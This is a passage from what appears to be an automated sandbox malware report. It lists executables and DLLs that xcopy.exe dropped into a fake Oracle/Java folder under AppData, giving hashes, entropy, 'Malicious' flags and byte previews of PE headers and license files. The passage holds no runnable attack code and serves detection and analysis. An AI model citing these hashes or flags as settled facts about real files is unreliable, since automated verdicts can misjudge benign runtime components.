                                                                                                                                                                                                                                  SSDEEP:1536:tAbBsnzA3QDkrDW8Kq5ns8nBs1s8nBs5s8nBskEsz2zy77hPxE:t8BszFJqkYUkEsqzy7pxE
                                                                                                                                                                                                                                  MD5:F9A898A606E7F5A1CD7CFFA8079253A0
                                                                                                                                                                                                                                  SHA1:A4433AB756C4C3132D6DFB8DCF1D806CE0410EC6
                                                                                                                                                                                                                                  SHA-256:89D8B352D1D387A8695A33BC3D45B1275E23082404AD8C0375C865F7DA883232
                                                                                                                                                                                                                                  SHA-512:51CB7C5984B51015FAEA3AED6004B2717ECCC50685057BD9E709945B1332F75A94D946E99BC698B13B780BE4727FF9C5FD90053F2EC71E5FBC2AA92EAA9CF98B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@..........................P......aN....@.....................................@....0...............&...(...@..8...H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc..8....@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):143488
                                                                                                                                                                                                                                  Entropy (8bit):6.6116058605853585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:E1jXs38sbIjSYgzan2Xcn36yWfbSIEh+Ilou5UFe86mChsx1e:E1jcRmIzs36yQ2IEh5lou5Me2e
                                                                                                                                                                                                                                  MD5:8680AD1D01FAC6B8928F7B79F991BE9C
                                                                                                                                                                                                                                  SHA1:80EA5D5E2A92DC9EAFCC2A9B23740B469FD67F3B
                                                                                                                                                                                                                                  SHA-256:9EC24FDF81E8BFCF8151A5091CAA1F516CE162CF6F4C50187B60676C3595E58B
                                                                                                                                                                                                                                  SHA-512:7117B1F9B2CC789112A11D8E95B598C6F3C03D16D98D81044771D955E3A7A27D025FDBB7605B43EDF44E4EFA3C30E8C3E8D75B2788015666CA99755326D6F220
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.....G...G...G.x(G...G.x.F...G.k.F...G...G...G.xFG...G.x.F...G.x.F...G.x.F...G.y.F...G.y.F...G.y.F...G.yDG...G.y.F...GRich...G................PE..L...|.d...........!.....P...........S.......`...............................0...........@.........................`...<................................(......h.......T...........................H...@............`...............................text....O.......P.................. ..`.rdata..f....`.......T..............@..@.data...............................@....rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38528
                                                                                                                                                                                                                                  Entropy (8bit):6.627847440883801
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8rAu9Aswd6cad6swBxAQA/h94929KEs0mz8mrzlm3vkYiZPxWEG0UBV:0LBaSQG49Es0mzBzlm3vk7ZPxnUX
                                                                                                                                                                                                                                  MD5:931EFE5BB5AF26C54D6F251623A995B1
                                                                                                                                                                                                                                  SHA1:7C31C0F09DADE6505DA2573D78F371B4DDDEC6D1
                                                                                                                                                                                                                                  SHA-256:4B7A7300A76DDC8C5941D1CA006C3A32AF145A0CA4B6B2F1353CDCF1D78DD9BC
                                                                                                                                                                                                                                  SHA-512:3570DC00ADD1EAF81F9FFACE903BD614819C7FF0D7D3864F85EFE4C336137753828C6EF90E793630469E4EC5BC29C723C752B43E233B6DADE7094D7CBD0E5444
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t.9...j...j...j.mXj...j.m.k...j.m.k...j.m.k...j.m.k...j.~.k...j...j...j.l.k...j.l.k...j.l4j...j.l.k...jRich...j................PE..L...|.d...........!.....:...4.......>.......P............................................@..........................a.......g.......................n...(......l...pX..T............................W..@............P..p............................text....9.......:.................. ..`.rdata..&"...P...$...>..............@..@.data................b..............@....rsrc................d..............@..@.reloc..l............h..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):219264
                                                                                                                                                                                                                                  Entropy (8bit):6.726188988309741
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:Se2Yad4EYw0MJobMI+kANwhMb6uA91Jd7pJN:52J4w0Mu7ONwy+X9FdJN
                                                                                                                                                                                                                                  MD5:500A16DDFA5861F513FA0719FFD43385
                                                                                                                                                                                                                                  SHA1:A2D35AEA903D86717772923F9B0D240085678CE8
                                                                                                                                                                                                                                  SHA-256:B3003F8719ED8D3477F0E6D6EECC3DA6F774517F723DAB1E385B25A348AA4161
                                                                                                                                                                                                                                  SHA-512:D97BD5B71F6C75000175D96A914539A4251BD2D16F87D420888F7FC2665E40437712B42095C64FED2D0EF09EE642ECD4199F5C02454EA6F76DBD24FFF4F388DB
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...T.K.T.K.T.K.,.K.T.K.,.J.T.K.?.J.T.K.,.J.T.K.,.J.T.K.,.J.T.K.-.J.T.K.T.K.T.K.-.J.T.K.-.J.T.K.-.J.T.K.-vK.T.K.-.J.T.KRich.T.K........................PE..L.....d...........!.........................................................`.......9....@.............................h............@...............0...(...P..8...8...T...........................x...@............................................text...t........................... ..`.rdata..v`.......b..................@..@.data........0......................@....rsrc........@......................@..@.reloc..8....P....... ..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23168
                                                                                                                                                                                                                                  Entropy (8bit):6.757498048724812
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:AMb500JRlSjo5/Wq82OtefQO4jIYi1oA6DPxh8E9VF0NyOJPFai7R:AMb500fZH8Z8fQGYiNSPxWEQV5
                                                                                                                                                                                                                                  MD5:0D0E43531543CFD4585044B20BAD70B8
                                                                                                                                                                                                                                  SHA1:D5BF28A0A84730030B5A238607AC89499C0F5A5C
                                                                                                                                                                                                                                  SHA-256:8ECB8C8E8CEDF2B65F622955F59D9BE711C846A2D6877D6F7918D63581A26092
                                                                                                                                                                                                                                  SHA-512:D24C32CA43E983ED3D19EC963D25067531FF5FBCE2F2F78182039F8F976C7D9746D586922360947E8461A8452594082251FE1B759CD41C0B72E9B9D3AE753119
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................`............@..................................'.......@..h............2...(...P......8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc.......P.......0..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1170904
                                                                                                                                                                                                                                  Entropy (8bit):6.805826320677691
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:+WiAihjcDBXUw9y079gzyVFExlfz+pq12S5qyrmcvIZPoy4spcFOo:NiAihjmXfgzyVFEWc2SEyApcco
                                                                                                                                                                                                                                  MD5:126FB99E7037B6A56A14D701FD27178B
                                                                                                                                                                                                                                  SHA1:0969F27C4A0D8270C34EDB342510DE4F388752CD
                                                                                                                                                                                                                                  SHA-256:10F8F24AA678DB8E38E6917748C52BBCD219161B9A07286D6F8093AB1D0318FA
                                                                                                                                                                                                                                  SHA-512:D787A9530BCE036D405988770621B6F15162347A892506CE637839AC83AC6C23001DC5B2292AFD652E0804BD327A7536D5F1B92412697C3BE335A03133D5FE17
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..\...\...\......\...]...\.......\...\...\..._...\...Y...\...R...\...X...\.......\...^...\.Rich..\.........................PE..L.................!................0................................................b....@A................................t".......@...................!...P......P...T...........................p...@............ ..p............................text...P........................... ..`.data...<...........................@....idata....... ......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):74368
                                                                                                                                                                                                                                  Entropy (8bit):6.549222671266717
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:g6pjoSiKJ+d9sJNItXvvl9+ePME7IgBK8G9mHP7CPxh:gtKJI9kytXnr+3E7IgBK8G9mvKxh
                                                                                                                                                                                                                                  MD5:74248894D78B8264A0E90A9D52ADDCFF
                                                                                                                                                                                                                                  SHA1:1594D51C47C0B3605F320A8058AF3062BF1A4280
                                                                                                                                                                                                                                  SHA-256:6FAC5761DD9EA351FA91C95137D8B1DB51CB67C6A8EB52BF5D9E09D46996666C
                                                                                                                                                                                                                                  SHA-512:FF918A2693CF12A2B6D955F68A75D1211ECCA2D896F9ABD6357286243995E4D66D66CDCDA4A4C7352E76C8838F84135766B8E8CF911A1AF3622621777CC94A83
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.Ei.Ei.E`.#Ey.E...Dk.E}..Dk.E..MEh.E...Dy.E...Dc.E...Dj.E.Dl.Ei.E(.E.Dn.E.Dh.E.OEh.E.Dh.ERichi.E........................PE..L.....d...........!.........T...............................................@............@.........................0.......D........ ...................(...0..........T...............................@............................................text...S........................... ..`.rdata...5.......6..................@..@.data...............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):181888
                                                                                                                                                                                                                                  Entropy (8bit):5.994928336585377
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:WsVcCXFzlZBn+ySSyyXC2BZC5vHa2L8jv+UII6qS2AroAxYN35gwxcPXtxF:WJCXNwSyMZOy406qS2AroAxnw6fF
                                                                                                                                                                                                                                  MD5:85F86F4450FAD5197994402EF62EC0F1
                                                                                                                                                                                                                                  SHA1:6C460E5F2554D27F7771F83DC7796714274A82C6
                                                                                                                                                                                                                                  SHA-256:C9A489EABD12B0A4561AB4EC4A6C1475830DF32C0D05E4FC563BB4B5DF1FAAAA
                                                                                                                                                                                                                                  SHA-512:1B9F88C1F015632AB86FA901010C7171E0E9FC072BB032A2B4B6D54EECDE178F245DF3A3ED83572CE8848645897BA0E5587E60047C04E3E8D1A388E6770512CD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..................................\....@.............................................D................(...........e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79792
                                                                                                                                                                                                                                  Entropy (8bit):6.778166830217706
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:5UwZIDobDaHrrAPsCbU4qzBHXpHo0ecbGp9yBOBDozi:7ZPDaHrrobUHzDxecbG3yGo
                                                                                                                                                                                                                                  MD5:BA65DB6BFEF78A96AEE7E29F1449BF8A
                                                                                                                                                                                                                                  SHA1:06C7BEB9FD1F33051B0E77087350903C652F4B77
                                                                                                                                                                                                                                  SHA-256:141690572594DBD3618A4984712E9E36FC09C9906BB845CE1A9531AC8F7AD493
                                                                                                                                                                                                                                  SHA-512:CA63EEAC10EF55D7E2E55479B25CF394E58AEF1422951F361F762AB667F72A3454F55AFC04E967E8CDD20CF3EEBE97083E0438EA941916A09E7D091818EA830E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L................."!.........................................................P......./....@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47744
                                                                                                                                                                                                                                  Entropy (8bit):6.793430588881946
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:DQCu8U/M85md+zriZodHjNFjj56MpC5p5B4ItF0k6bJcgqKpeHWstq256QYi4Pxj:MCu8U/M0booC5DiIn0k6bJc+Kq256Q7W
                                                                                                                                                                                                                                  MD5:EC9BA69D10F66D4CC7EC47A1BD1BC0AF
                                                                                                                                                                                                                                  SHA1:1B2645BDA13031E3A9621EE1E618B03F4E1E7382
                                                                                                                                                                                                                                  SHA-256:595D733EE4BBA6983CF69691D1229A83D1A37E52C36144CCC7736CF134677A2F
                                                                                                                                                                                                                                  SHA-512:2EACF056E8CCDBA1521F7890CFCF247AF306FB2BEA6CB782856802629EB95D5AF671956158419281FC0B31CD3B1356CD74D09DFDE9444266DEAC7F300546BD85
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................3......................................I............I......I......I._....I......Rich...........PE..L...{.d...........!.....Z...8......G_.......p......................................#.....@.................................X............................(..........`...T...............................@............p..0............................text....X.......Z.................. ..`.rdata..t%...p...&...^..............@..@.data...\...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28800
                                                                                                                                                                                                                                  Entropy (8bit):6.652515502461702
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:g23Q1LneyoeJ6YnwtNoZTUH5QkOH0bGGGGNET7T7T7T7lW6/uVL0YYirPxWE1o:g23QBe26YnwtNoZTUH5QkOH0bGGGGNEf
                                                                                                                                                                                                                                  MD5:8C424B5E5C093797E49BA5C9542DC43B
                                                                                                                                                                                                                                  SHA1:044D1626923141E609ADF87995A5AB4545327E9B
                                                                                                                                                                                                                                  SHA-256:B77A8459BA6A93577DD55E2D96965AD2B62D486D3981A633DA2DD711F0F50C84
                                                                                                                                                                                                                                  SHA-512:B2ED8C2779A93E68753DBC836212648976D3309ADD993C1FC115AD8F208AEF683144D8DF68DC76D2DF150E8ADAC6403ED43432596C325D670CF59C0024669432
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................X................................................K......K......K.4....K......Rich...........PE..L...|.d...........!..... ...(......f$.......0............................................@.........................pA......hB.......`...............H...(...p.......<..T...........................0<..@............0...............................text...'........ .................. ..`.rdata..6....0.......$..............@..@.data........P.......>..............@....rsrc........`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):192128
                                                                                                                                                                                                                                  Entropy (8bit):6.5648833435840785
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:QmGI7TqvIQqpw+SVoj7URnMEGOwHVpd1dqxVQ7UlDhcB4QZfFORoJoAaxB:QxEwLSSi7UBZSVX1dOTo4QZfkoY
                                                                                                                                                                                                                                  MD5:7CB2AC0CA9D8C0E01AFA6548739763BE
                                                                                                                                                                                                                                  SHA1:A3913090E2FC01659EF06198CEA14DB5483EDAA1
                                                                                                                                                                                                                                  SHA-256:9A51C1F6D22A398AB8C518ACA3381778C182944EEE7682E57E8FAE01EB08AE54
                                                                                                                                                                                                                                  SHA-512:11828DAFD0F3317AD66AF9A9D1C51CAFD7DC78C4D4389DC40754532CD10902A76338DE3C90EBA6EC84213E5A3267BFD8014324C08C36D56498E14960B0329466
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K3.e.R`6.R`6.R`6.9c7.R`6.9e7.R`6m*.6.R`6m*d7.R`6m*c7.R`6m*e7?R`6.9d7.R`6.9a7.R`6.Ra6.R`6.+e7.R`6.+`7.R`6.+.6.R`6.+b7.R`6Rich.R`6........................PE..L.....d...........!................_................................................5....@.........................`v.......w..........P................(...... "...L..................................@....................u..@....................text...|........................... ..`.rdata.............................@..@.data....#...........z..............@....rsrc...P...........................@..@.reloc.. ".......$..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):81536
                                                                                                                                                                                                                                  Entropy (8bit):6.978212497277623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:P3PmBVRZ03ZfbWbv+y4l2NSIOQIOm8xKxweT7SPxQ:P3e03Nbkml26Gm8xKxweTyxQ
                                                                                                                                                                                                                                  MD5:4192E4629D7CAD5A3612A0F53A7504F3
                                                                                                                                                                                                                                  SHA1:2FE83BD21D918347DB9D580BFE59D52A29B8FB8F
                                                                                                                                                                                                                                  SHA-256:98A8760BB26690357C21A572266104030C6693B82A1914F41C7D7A979C5F08DC
                                                                                                                                                                                                                                  SHA-512:223944DE87257511E8EEEAA34BAD28EEC5FE960B90F8408AE23FEA4D1D4915ECFFC310CAC1B042D69A86E8911A097D9ABB17095CD0ABFC0EA88CDD8BC6886834
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v..v..v...M..v.....v.....v...#..v.....v.....v.....v.f...v..v..v.f...v.f...v.f.!..v.f...v.Rich.v.........................PE..L...~.d...........!.........r......0........................................`.......6....@..........................................@...................(...P..p...p...T...............................@............................................text............................... ..`.rdata...c.......d..................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\directshow.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1165
                                                                                                                                                                                                                                  Entropy (8bit):5.191749491970965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jzIDkrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF51:fIDkaJHlxE35QHOs5exm3ogF51
                                                                                                                                                                                                                                  MD5:B1047DB8237B15D97B1DD072F71F4D15
                                                                                                                                                                                                                                  SHA1:2484425DF3BE1049DE4016ED88E5518AA9751B35
                                                                                                                                                                                                                                  SHA-256:D847DA5757A30D093DB3F90A0BAC9B1699A52965DAA3EC5DEDF3EBF14C81C698
                                                                                                                                                                                                                                  SHA-512:BBD78681A97ABF5FE515BE598F81EDB4D2140E0DD12959F3AB6F89609E9962991BB5BFE09EED67CDD29529C51ECBDF59C37A61BB0D592250B0F9AD0C6090798B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Microsoft DirectShow Samples v156905..### MIT License (MIT).```..Copyright (c) 1992-2004 Microsoft Corporation. All rights reserved...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABIL

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\glib.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32257
                                                                                                                                                                                                                                  Entropy (8bit):4.787159083415034
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Bj5ZBxQE56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0H:BYE5trLeDnFMz1ReScmc7GshZuQ/e
                                                                                                                                                                                                                                  MD5:09FBB492ACBA3E18F4269CC136BBC279
                                                                                                                                                                                                                                  SHA1:6972B4E70945759C11333895F99101690988F486
                                                                                                                                                                                                                                  SHA-256:73886CB0C3B649E92F8D5EA9A0977D024E13BF822D1F0E45AC94960C0EC98081
                                                                                                                                                                                                                                  SHA-512:47F09FF00141B0AB2D2D20774A1773979C60930000701907944722B9A326E71DF25FC3D4E9DB2F8C91CF480E3F4ABD403595A150FDC946C7CCBEA891326B133B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## GNU Glib v2.72.0..### Glib Notice.```..You are receiving a copy of GNU Glib, Version: 2.72.0 in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to the GNU Glib, Version: 2.72.0; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On 32-bit Linux systems: delete $(JAVA_HOME)/lib/i386/libglib-lite.so. - On 64-bit Linux systems: delete $(JAVA_HOME)/lib/amd64/libglib-lite.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libglib-lite.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\glib-lite.dll..A copy of the Oracle modified GNU Glib library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the GNU Glib source.code is here:.. rt/modul

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\gstreamer.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35218
                                                                                                                                                                                                                                  Entropy (8bit):4.873624721337186
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8j05nE5trLeDnFMz1ReScmc7GshZuQPhQ6FdM:8j05nE5N7PhcmCGUZfhdm
                                                                                                                                                                                                                                  MD5:1E6C7B5215E55D92E9C0FCC1C5A4870E
                                                                                                                                                                                                                                  SHA1:F120989E2E866A597735185D0718AEE54CF60221
                                                                                                                                                                                                                                  SHA-256:94A5B4883B87E660A93B0A5DBDEEA7CC12DB0916993F42A245DEE691CB6DACC0
                                                                                                                                                                                                                                  SHA-512:0C32D034FD501FB0FEFB6CDA170129EEC8BDA57E03AAD8937F8E670C8482F2740990A78852D3C2E51C95B52B94DF6B1ABBB9D911149DF640E4038DBC8D60ACDB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## GStreamer v1.20.1..### GStreamer Notice.```..You are receiving a copy of GStreamer, Version: 1.20.1 in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to the GStreamer, Version: 1.20.1; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On 32-bit Linux systems: delete $(JAVA_HOME)/lib/i386/libgstreamer-lite.so. - On 64-bit Linux systems: delete $(JAVA_HOME)/lib/amd64/libgstreamer-lite.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libgstreamer-lite.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\gstreamer-lite.dll..A copy of the Oracle modified GStreamer library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the GStreamer sou

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\legal\javafx\icu_web.md

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24196
                                                                                                                                                                                                                                  Entropy (8bit):5.10190765027611
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IQEggAu3VXrfE/sparftM6rs6NTCeFrsirsOu6NPrsirshu6NTsPmtq0vrrXJruW:vElAEVXrE/carRrTCetu6NPt56N4mttF
                                                                                                                                                                                                                                  MD5:879D1401BCCD964D09965CFFF1F04C94
                                                                                                                                                                                                                                  SHA1:811AA8C47845CAFE7D8118EA59D892DED733BC3E
